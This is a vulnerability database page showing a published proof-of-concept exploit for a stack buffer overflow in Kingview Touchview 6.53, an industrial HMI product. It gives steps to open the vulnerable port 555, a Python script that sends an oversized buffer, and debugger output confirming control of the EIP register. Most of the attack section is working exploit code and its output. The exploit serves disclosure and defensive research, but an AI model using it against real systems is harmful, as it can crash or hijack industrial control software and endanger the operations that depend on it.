Vulners
Lucene search
Kingview Touchview 6.53 EIP Overwrite
# Exploit Title: Kingview Touchview EIP direct control
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com
# Version: 6.53
# Tested on: Windows SP 1
# CVE :
Open kingivew click on Make choose network configuration--->network
parameter , then go to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.
import os
import socket
import sys
host ="10.0.2.15"
port = 555
exploit = ("\x90"*1024)
exploit += ("A"*23976)
exploit += ("B"*12500)
exploit += ("D"*6250)
exploit += ("E"*6002)
exploit += ("\x44\x43\x42\x41")
exploit += ("\x90"*256)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(exploit)
data = s.recv(1024)
print " [+] Closing connection.."
s.close()
print " [+] Done!"
eax=7ffdf000 ebx=00000000 ecx=40000000 edx=00000008 esi=41424344
edi=0012f6b4
eip=41424344 esp=0012f650 ebp=0012f678 iopl=0 nv up ei pl nz na po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010202
41424344 ??
CALL TO STACK
0x41424344
USER32!GetDC+0x6d
USER32!EnumDisplaySettingsA+0x27d
USER32!EnumDisplaySettingsA+0xc9
USER32!DefDlgProcA+0x22
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1